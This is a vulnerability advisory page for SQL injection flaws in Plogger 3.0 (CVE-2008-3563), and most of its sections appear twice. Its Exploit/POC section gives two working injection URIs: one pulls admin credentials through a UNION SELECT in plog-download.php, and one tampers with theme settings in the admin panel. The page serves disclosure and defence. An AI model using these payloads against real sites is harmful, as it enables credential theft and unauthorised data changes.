Plogger Multiple SQL Injection Vulnerabilities
BID:30547
Info
Plogger Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 30547 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3563 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 05 2008 12:00AM |
| Updated: | May 07 2015 05:25PM |
| Credit: | James Bercegay of the GulfTech Security Research Team |
| Vulnerable: |
Plogger Plogger 3.0 |
| Not Vulnerable: | |
Discussion
Plogger Multiple SQL Injection Vulnerabilities
Plogger is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Plogger 3.0 and prior versions are vulnerable.
Plogger is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Plogger 3.0 and prior versions are vulnerable.
Exploit / POC
Plogger Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/plog-download.php?dl_type=album&checked[]=' UNION SELECT concat(admin_username,char(58),admin_password),0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM plogger_config/*
http://www.example.com/admin/plog-themes.php?activate=%00', `theme_dir` = concat(feed_title,char(0)) -- *
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/plog-download.php?dl_type=album&checked[]=' UNION SELECT concat(admin_username,char(58),admin_password),0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM plogger_config/*
http://www.example.com/admin/plog-themes.php?activate=%00', `theme_dir` = concat(feed_title,char(0)) -- *
Solution / Fix
Plogger Multiple SQL Injection Vulnerabilities
Solution:
Fixes are available in the Plogger SVN repository. Please see the references for more information.
Solution:
Fixes are available in the Plogger SVN repository. Please see the references for more information.
References
Plogger Multiple SQL Injection Vulnerabilities
References:
References:
- Changeset 569 (Plogger)
- Plogger Homepage (Plogger)